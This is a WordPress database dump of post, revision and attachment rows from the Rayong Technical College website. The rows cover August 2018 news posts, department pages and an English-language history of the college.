(3586, 3, '2018-08-07 09:01:45', '2018-08-07 02:01:45', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D648600905516101%26id%3D100010985913485&width=500\" width=\"500\" height=\"818\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมเชิงปฏิบัติการผู้ประเมินองค์การมาตรฐานดีเด่น และสมาชิกดีเด่นโครงการภายใต้การนิเทศ รุ่นที่ 5 ระหว่างวันที่ 31 กรกฎาคม - 2 สิงหาคม 2561 ณ โรงแรมโกลเด้นซิตี้ ระยอง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%87%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4-4', '', '', '2018-08-07 09:01:45', '2018-08-07 02:01:45', '', 0, 'http://www.technicrayong.ac.th/?p=3586', 349, 'post', '', 0),
(3587, 3, '2018-08-07 09:00:40', '2018-08-07 02:00:40', '', '38600202_648599425516249_7235743472429301760_n', '', 'inherit', 'closed', 'closed', '', '38600202_648599425516249_7235743472429301760_n', '', '', '2018-08-07 09:00:40', '2018-08-07 02:00:40', '', 3586, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38600202_648599425516249_7235743472429301760_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(3588, 3, '2018-08-07 09:01:45', '2018-08-07 02:01:45', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D648600905516101%26id%3D100010985913485&width=500\" width=\"500\" height=\"818\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมเชิงปฏิบัติการผู้ประเมินองค์การมาตรฐานดีเด่น และสมาชิกดีเด่นโครงการภายใต้การนิเทศ รุ่นที่ 5 ระหว่างวันที่ 31 กรกฎาคม - 2 สิงหาคม 2561 ณ โรงแรมโกลเด้นซิตี้ ระยอง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '3586-revision-v1', '', '', '2018-08-07 09:01:45', '2018-08-07 02:01:45', '', 3586, 'http://www.technicrayong.ac.th/3586-revision-v1/', 0, 'revision', '', 0),
(3589, 3, '2018-08-07 09:02:00', '2018-08-07 02:02:00', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D648600905516101%26id%3D100010985913485&width=500\" width=\"500\" height=\"818\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอบรมเชิงปฏิบัติการผู้ประเมินองค์การมาตรฐานดีเด่น และสมาชิกดีเด่นโครงการภายใต้การนิเทศ รุ่นที่ 5 ระหว่างวันที่ 31 กรกฎาคม - 2 สิงหาคม 2561 ณ โรงแรมโกลเด้นซิตี้ ระยอง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '3586-autosave-v1', '', '', '2018-08-07 09:02:00', '2018-08-07 02:02:00', '', 3586, 'http://www.technicrayong.ac.th/3586-autosave-v1/', 0, 'revision', '', 0),
(3591, 3, '2018-08-07 09:23:27', '2018-08-07 02:23:27', '', '7-8-2561 9-24-38', '', 'inherit', 'closed', 'closed', '', '7-8-2561-9-24-38', '', '', '2018-08-07 09:23:27', '2018-08-07 02:23:27', '', 1976, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/7-8-2561-9-24-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(3592, 3, '2018-08-07 09:23:33', '2018-08-07 02:23:33', '', '7-8-2561 9-25-10', '', 'inherit', 'closed', 'closed', '', '7-8-2561-9-25-10', '', '', '2018-08-07 09:23:33', '2018-08-07 02:23:33', '', 1976, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/7-8-2561-9-25-10.jpg', 0, 'attachment', 'image/jpeg', 0),
(3593, 3, '2018-08-07 09:24:10', '2018-08-07 02:24:10', '<img class=\"aligncenter wp-image-1978 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-16-33-39.jpg\" alt=\"\" width=\"195\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1977\" src=\"/wp-content/uploads/2018/03/22-3-2561-16-31-27-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3591\" src=\"/wp-content/uploads/2018/08/7-8-2561-9-24-38.jpg\" alt=\"\" width=\"952\" height=\"624\" /> <img class=\"aligncenter size-full wp-image-3592\" src=\"/wp-content/uploads/2018/08/7-8-2561-9-25-10.jpg\" alt=\"\" width=\"951\" height=\"619\" />', 'ช่างเชื่อม', '', 'inherit', 'closed', 'closed', '', '1976-revision-v1', '', '', '2018-08-07 09:24:10', '2018-08-07 02:24:10', '', 1976, 'http://www.technicrayong.ac.th/1976-revision-v1/', 0, 'revision', '', 0),
(3595, 3, '2018-08-07 09:59:23', '2018-08-07 02:59:23', '', '7-8-2561 10-01-38', '', 'inherit', 'closed', 'closed', '', '7-8-2561-10-01-38', '', '', '2018-08-07 09:59:23', '2018-08-07 02:59:23', '', 2074, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/7-8-2561-10-01-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(3596, 3, '2018-08-07 09:59:27', '2018-08-07 02:59:27', '', '7-8-2561 10-01-12', '', 'inherit', 'closed', 'closed', '', '7-8-2561-10-01-12', '', '', '2018-08-07 09:59:27', '2018-08-07 02:59:27', '', 2074, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/7-8-2561-10-01-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(3597, 3, '2018-08-07 09:59:31', '2018-08-07 02:59:31', '', '7-8-2561 10-00-50', '', 'inherit', 'closed', 'closed', '', '7-8-2561-10-00-50', '', '', '2018-08-07 09:59:31', '2018-08-07 02:59:31', '', 2074, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/7-8-2561-10-00-50.jpg', 0, 'attachment', 'image/jpeg', 0),
(3598, 3, '2018-08-07 09:59:33', '2018-08-07 02:59:33', '', '7-8-2561 9-34-15', '', 'inherit', 'closed', 'closed', '', '7-8-2561-9-34-15', '', '', '2018-08-07 09:59:33', '2018-08-07 02:59:33', '', 2074, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/7-8-2561-9-34-15.jpg', 0, 'attachment', 'image/jpeg', 0),
(3599, 3, '2018-08-07 09:59:41', '2018-08-07 02:59:41', '', '7-8-2561 9-29-27', '', 'inherit', 'closed', 'closed', '', '7-8-2561-9-29-27', '', '', '2018-08-07 09:59:41', '2018-08-07 02:59:41', '', 2074, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/7-8-2561-9-29-27.jpg', 0, 'attachment', 'image/jpeg', 0),
(3600, 3, '2018-08-07 10:01:11', '2018-08-07 03:01:11', '<img class=\"aligncenter size-full wp-image-3598\" src=\"/wp-content/uploads/2018/08/7-8-2561-9-34-15.jpg\" alt=\"\" width=\"192\" height=\"239\" /> <img class=\"aligncenter wp-image-3599\" src=\"/wp-content/uploads/2018/08/7-8-2561-9-29-27.jpg\" alt=\"\" width=\"379\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3597\" src=\"/wp-content/uploads/2018/08/7-8-2561-10-00-50.jpg\" alt=\"\" width=\"953\" height=\"644\" /> <img class=\"aligncenter size-full wp-image-3596\" src=\"/wp-content/uploads/2018/08/7-8-2561-10-01-12.jpg\" alt=\"\" width=\"954\" height=\"641\" /> <img class=\"aligncenter size-full wp-image-3595\" src=\"/wp-content/uploads/2018/08/7-8-2561-10-01-38.jpg\" alt=\"\" width=\"953\" height=\"307\" />', 'ช่างไฟฟ้า', '', 'inherit', 'closed', 'closed', '', '2074-revision-v1', '', '', '2018-08-07 10:01:11', '2018-08-07 03:01:11', '', 2074, 'http://www.technicrayong.ac.th/2074-revision-v1/', 0, 'revision', '', 0),
(3601, 3, '2018-08-07 10:01:38', '2018-08-07 03:01:38', '<img class=\"aligncenter size-full wp-image-3598\" src=\"/wp-content/uploads/2018/08/7-8-2561-9-34-15.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-3599\" src=\"/wp-content/uploads/2018/08/7-8-2561-9-29-27.jpg\" alt=\"\" width=\"379\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3597\" src=\"/wp-content/uploads/2018/08/7-8-2561-10-00-50.jpg\" alt=\"\" width=\"953\" height=\"644\" /> <img class=\"aligncenter size-full wp-image-3596\" src=\"/wp-content/uploads/2018/08/7-8-2561-10-01-12.jpg\" alt=\"\" width=\"954\" height=\"641\" /> <img class=\"aligncenter size-full wp-image-3595\" src=\"/wp-content/uploads/2018/08/7-8-2561-10-01-38.jpg\" alt=\"\" width=\"953\" height=\"307\" />', 'ช่างไฟฟ้า', '', 'inherit', 'closed', 'closed', '', '2074-revision-v1', '', '', '2018-08-07 10:01:38', '2018-08-07 03:01:38', '', 2074, 'http://www.technicrayong.ac.th/2074-revision-v1/', 0, 'revision', '', 0),
(3603, 3, '2018-08-08 11:08:54', '2018-08-08 04:08:54', '', '1', '', 'inherit', 'closed', 'closed', '', '1-6', '', '', '2018-08-08 11:08:54', '2018-08-08 04:08:54', '', 1976, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/1.jpg', 0, 'attachment', 'image/jpeg', 0),
(3604, 3, '2018-08-08 11:09:10', '2018-08-08 04:09:10', '', '2', '', 'inherit', 'closed', 'closed', '', '2-3', '', '', '2018-08-08 11:09:10', '2018-08-08 04:09:10', '', 1976, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/2.jpg', 0, 'attachment', 'image/jpeg', 0),
(3605, 3, '2018-08-08 11:09:46', '2018-08-08 04:09:46', '<img class=\"aligncenter wp-image-1978 size-full\" src=\"/wp-content/uploads/2018/03/22-3-2561-16-33-39.jpg\" alt=\"\" width=\"195\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1977\" src=\"/wp-content/uploads/2018/03/22-3-2561-16-31-27-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3603\" src=\"/wp-content/uploads/2018/08/1.jpg\" alt=\"\" width=\"956\" height=\"628\" /> <img class=\"aligncenter size-full wp-image-3604\" src=\"/wp-content/uploads/2018/08/2.jpg\" alt=\"\" width=\"957\" height=\"625\" />\r\n\r\n ', 'ช่างเชื่อม', '', 'inherit', 'closed', 'closed', '', '1976-revision-v1', '', '', '2018-08-08 11:09:46', '2018-08-08 04:09:46', '', 1976, 'http://www.technicrayong.ac.th/1976-revision-v1/', 0, 'revision', '', 0),
(3607, 3, '2018-08-08 11:25:19', '2018-08-08 04:25:19', '', '8-8-2561 11-26-44', '', 'inherit', 'closed', 'closed', '', '8-8-2561-11-26-44', '', '', '2018-08-08 11:25:19', '2018-08-08 04:25:19', '', 3296, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/8-8-2561-11-26-44.jpg', 0, 'attachment', 'image/jpeg', 0),
(3608, 3, '2018-08-08 11:27:23', '2018-08-08 04:27:23', '<img class=\"aligncenter size-full wp-image-3298\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-47-43.jpg\" alt=\"\" width=\"194\" height=\"242\" /> <img class=\"aligncenter wp-image-3297\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-30-47-300x79.jpg\" alt=\"\" width=\"384\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3607\" src=\"/wp-content/uploads/2018/08/8-8-2561-11-26-44.jpg\" alt=\"\" width=\"959\" height=\"624\" />', 'คอมพิวเตอร์ธุรกิจ', '', 'inherit', 'closed', 'closed', '', '3296-revision-v1', '', '', '2018-08-08 11:27:23', '2018-08-08 04:27:23', '', 3296, 'http://www.technicrayong.ac.th/3296-revision-v1/', 0, 'revision', '', 0),
(3610, 3, '2018-08-08 11:37:48', '2018-08-08 04:37:48', '', '8-8-2561 11-39-38', '', 'inherit', 'closed', 'closed', '', '8-8-2561-11-39-38', '', '', '2018-08-08 11:37:48', '2018-08-08 04:37:48', '', 1751, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/8-8-2561-11-39-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(3611, 3, '2018-08-08 11:38:14', '2018-08-08 04:38:14', '<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-3610 size-full\" src=\"/wp-content/uploads/2018/08/8-8-2561-11-39-38.jpg\" alt=\"\" width=\"238\" height=\"312\" />\r\n\r\n ', 'งานวิจัย พัฒนา นวัตกรรม และสิ่งประดิษฐ์', '', 'inherit', 'closed', 'closed', '', '1751-revision-v1', '', '', '2018-08-08 11:38:14', '2018-08-08 04:38:14', '', 1751, 'http://www.technicrayong.ac.th/1751-revision-v1/', 0, 'revision', '', 0),
(3613, 3, '2018-08-08 15:59:35', '2018-08-08 08:59:35', '', '1', '', 'inherit', 'closed', 'closed', '', '1-7', '', '', '2018-08-08 15:59:35', '2018-08-08 08:59:35', '', 3296, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/1-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(3614, 3, '2018-08-08 15:59:37', '2018-08-08 08:59:37', '', '2', '', 'inherit', 'closed', 'closed', '', '2-4', '', '', '2018-08-08 15:59:37', '2018-08-08 08:59:37', '', 3296, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/2-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(3615, 3, '2018-08-08 16:00:28', '2018-08-08 09:00:28', '<img class=\"aligncenter size-full wp-image-3298\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-47-43.jpg\" alt=\"\" width=\"194\" height=\"242\" /> <img class=\"aligncenter wp-image-3297\" src=\"/wp-content/uploads/2018/07/4-7-2561-12-30-47-300x79.jpg\" alt=\"\" width=\"384\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3613\" src=\"/wp-content/uploads/2018/08/1-1.jpg\" alt=\"\" width=\"954\" height=\"625\" /> <img class=\"aligncenter size-full wp-image-3614\" src=\"/wp-content/uploads/2018/08/2-1.jpg\" alt=\"\" width=\"953\" height=\"307\" />', 'คอมพิวเตอร์ธุรกิจ', '', 'inherit', 'closed', 'closed', '', '3296-revision-v1', '', '', '2018-08-08 16:00:28', '2018-08-08 09:00:28', '', 3296, 'http://www.technicrayong.ac.th/3296-revision-v1/', 0, 'revision', '', 0),
(3617, 2, '2018-08-09 15:48:44', '2018-08-09 08:48:44', '', 'RTC R-Radio Network', '', 'publish', 'closed', 'closed', '', 'rtc-r-radio-network', '', '', '2018-08-09 15:48:44', '2018-08-09 08:48:44', '', 0, 'http://www.technicrayong.ac.th/?page_id=3617', 0, 'page', '', 0),
(3618, 2, '2018-08-09 15:48:44', '2018-08-09 08:48:44', '', 'RTC R-Radio Network', '', 'inherit', 'closed', 'closed', '', '3617-revision-v1', '', '', '2018-08-09 15:48:44', '2018-08-09 08:48:44', '', 3617, 'http://www.technicrayong.ac.th/3617-revision-v1/', 0, 'revision', '', 0),
(3626, 3, '2018-08-10 08:57:04', '2018-08-10 01:57:04', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h2><strong><span style=\"color: #808080;\">Education Management </span></strong></h2>\r\n<h4><span style=\"color: #808080;\">In 1938 was the beginning of the vocational education and training for 3-years course for grade 4 graduates to study in the carpentry department. The first generation totaled 34 students. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1942 the Hairdresser department opened providing 2-years course, later this was cancelled due to the lack of students.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1949 the Hairdresser department was reopened and 3 more classrooms were built for 1st year students of carpentry. </span></h4>\r\n<h4><span style=\"color: #808080;\">In 1950 the Hairdresser department was shut down for the second time.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1953 Education expanded to senior high school level and for vocational junior high school graduates including grade 9 to enter the 3-year carpentry course.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1957 the mechanic department opened up to vocational senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1960 the carpentry department opened to high vocational education and the mechanic department was cancelled.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1963 the mechanic department opened for the second time and also opened up to grade 10-12 of a vocational education construction department.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1970 the sheet metal welder department opened up to senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1976 the machine shop department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1977 the electric power department opened up to vocational certificate.</span></h4>\r\n<h4><span style=\"color: #808080;\">In 1979 the commercial department opened up to vocational certificate.</span></h4>', 'The College Background', '', 'publish', 'closed', 'closed', '', 'the-college-background', '', '', '2018-09-18 12:57:33', '2018-09-18 05:57:33', '', 0, 'http://www.technicrayong.ac.th/?page_id=3626', 0, 'page', '', 0),
(3627, 3, '2018-08-10 08:57:04', '2018-08-10 01:57:04', '<b>Located</b> 086/13, Taksin Maharach Rd, Tapradoo Sub-district,\r\n\r\nMuang District, Rayong, Thailand 21000\r\n\r\nTel: 038-611-160, 038-611-192 Fax: 038-970-717\r\n\r\nThe area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)\r\n\r\n<b>Background</b>, on the 3rd of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on\r\n\r\nan empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.\r\n\r\n<b>Background</b>, on 1958 bought more land for 8,000 sqm. (5 rai) and got approved for name changed to “Karn Chang Mai Rayong School” On 1966 The Ministry of Education affirmation name included “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” to “ Karn Chang Rayong School” and got approved to “Rayong Technical School” On 1st of October 1977 after raise from school to the college by the name “Rayong Technical College” on 1st of May 1980 until now.\r\n\r\n ', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-08-10 08:57:04', '2018-08-10 01:57:04', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3629, 3, '2018-08-10 08:58:10', '2018-08-10 01:58:10', '<b>Located</b> 086/13, Taksin Maharach Rd, Tapradoo Sub-district,\r\n<p style=\"text-align: left;\">Muang District, Rayong, Thailand 21000</p>\r\nTel: 038-611-160, 038-611-192 Fax: 038-970-717\r\n\r\nThe area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)\r\n\r\n<b>Background</b>, on the 3rd of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.\r\n\r\n<b>Background</b>, on 1958 bought more land for 8,000 sqm. (5 rai) and got approved for name changed to “Karn Chang Mai Rayong School” On 1966 The Ministry of Education affirmation name included “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” to “ Karn Chang Rayong School” and got approved to “Rayong Technical School” On 1st of October 1977 after raise from school to the college by the name “Rayong Technical College” on 1st of May 1980 until now.\r\n\r\n ', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-08-10 08:58:10', '2018-08-10 01:58:10', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3632, 3, '2018-08-10 09:08:39', '2018-08-10 02:08:39', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<b>Located</b> 086/13, Taksin Maharach Rd, Tapradoo Sub-district,\r\n<p style=\"text-align: left;\">Muang District, Rayong, Thailand 21000</p>\r\nTel: 038-611-160, 038-611-192 Fax: 038-970-717\r\n\r\nThe area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)\r\n\r\n<b>Background</b>, on the 3rd of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.\r\n\r\n<b>Background</b>, on 1958 bought more land for 8,000 sqm. (5 rai) and got approved for name changed to “Karn Chang Mai Rayong School” On 1966 The Ministry of Education affirmation name included “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” to “ Karn Chang Rayong School” and got approved to “Rayong Technical School” On 1st of October 1977 after raise from school to the college by the name “Rayong Technical College” on 1st of May 1980 until now.\r\n\r\n ', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-08-10 09:08:39', '2018-08-10 02:08:39', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3633, 3, '2018-08-10 09:18:45', '2018-08-10 02:18:45', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D650369615339230%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมบันทึกความเข้าใจ(MOU)ความร่วมมือทางวิชาการ ระหว่างวิทยาลัยเทคนิคระยอง กับ โรงเรียนชุมชนวัดตะเคียนงาม นำโดยนางอัญชลี สารสุวรรณ์ ผู้อำนวยการโรงเรียนชุมชนวัดตะเคียนงาม บุคลากรทางการศึกษา ในการศึกษาโครงการพัฒนาหลักสูตรทักษะอาชีพเครื่องสำอางสมุนไพรใบขลู่ต่อเนื่องเชื่อมโยงการศึกษาขั้นพื้นฐาน ในวิชาการเป็นผู้ประกอบการ และประเมินผลการเรียนและนำไปใช้ในการเรียนสายอาชีวศึกษา รวมทั้งวิชาอื่น ณ วิทยาลัยเทคนิคระยอง วันพุธที่ 8 สิงหาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%9a%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b6%e0%b8%81%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b9%83%e0%b8%88mou%e0%b8%84', '', '', '2018-08-10 09:18:45', '2018-08-10 02:18:45', '', 0, 'http://www.technicrayong.ac.th/?p=3633', 348, 'post', '', 0),
(3634, 3, '2018-08-10 09:18:28', '2018-08-10 02:18:28', '', '38823690_650357482007110_3022558671642034176_o', '', 'inherit', 'closed', 'closed', '', '38823690_650357482007110_3022558671642034176_o', '', '', '2018-08-10 09:18:28', '2018-08-10 02:18:28', '', 3633, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/38823690_650357482007110_3022558671642034176_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3635, 3, '2018-08-10 09:18:45', '2018-08-10 02:18:45', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D650369615339230%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ร่วมบันทึกความเข้าใจ(MOU)ความร่วมมือทางวิชาการ ระหว่างวิทยาลัยเทคนิคระยอง กับ โรงเรียนชุมชนวัดตะเคียนงาม นำโดยนางอัญชลี สารสุวรรณ์ ผู้อำนวยการโรงเรียนชุมชนวัดตะเคียนงาม บุคลากรทางการศึกษา ในการศึกษาโครงการพัฒนาหลักสูตรทักษะอาชีพเครื่องสำอางสมุนไพรใบขลู่ต่อเนื่องเชื่อมโยงการศึกษาขั้นพื้นฐาน ในวิชาการเป็นผู้ประกอบการ และประเมินผลการเรียนและนำไปใช้ในการเรียนสายอาชีวศึกษา รวมทั้งวิชาอื่น ณ วิทยาลัยเทคนิคระยอง วันพุธที่ 8 สิงหาคม 2561', '', 'inherit', 'closed', 'closed', '', '3633-revision-v1', '', '', '2018-08-10 09:18:45', '2018-08-10 02:18:45', '', 3633, 'http://www.technicrayong.ac.th/3633-revision-v1/', 0, 'revision', '', 0),
(3637, 3, '2018-08-10 09:47:21', '2018-08-10 02:47:21', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D650369615339230%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Wednesday 8th August 2018, The Memorandum of Understanding (MOU) a cooperation of academic studies between Rayong Technical College and Wat Ta-Kien Ngam Community School was reached by The Director’s Mrs. Uncharee Sansuwun and education staffs of Wat Ta-Kien Ngam Community School and learned about Bai Khalu herb (Indian marsh fleabane) cosmetic curriculum, professional skills development project, and basic education in Entrepreneurship.', '', 'publish', 'closed', 'open', '', 'memorandum-of-understanding-mou-cooperation-of-academic-between-rayong-technical-college-and-wat-ta-kien-ngam-community-school-by-the-directors-mrs-uncharee-sansuwun-and-education-staffs-o', '', '', '2018-08-14 11:33:27', '2018-08-14 04:33:27', '', 0, 'http://www.technicrayong.ac.th/?p=3637', 347, 'post', '', 0),
(3639, 3, '2018-08-10 09:47:22', '2018-08-10 02:47:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D650369615339230%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'Memorandum of Understanding (MOU) cooperation of academic between Rayong Technical College and Wat Ta-Kien Ngam Community School by The Director’s Mrs. Uncharee Sansuwun and education staffs of Wat Ta-Kien Ngam Community School for learning in Bai Khalu herb (Indian marsh fleabane) cosmetic curriculum professional skills development project and connect to basic education in Entrepreneurship And evaluation subject Also can apply for vocational education study include other subjects..', '', 'inherit', 'closed', 'closed', '', '3637-revision-v1', '', '', '2018-08-10 09:47:22', '2018-08-10 02:47:22', '', 3637, 'http://www.technicrayong.ac.th/3637-revision-v1/', 0, 'revision', '', 0);
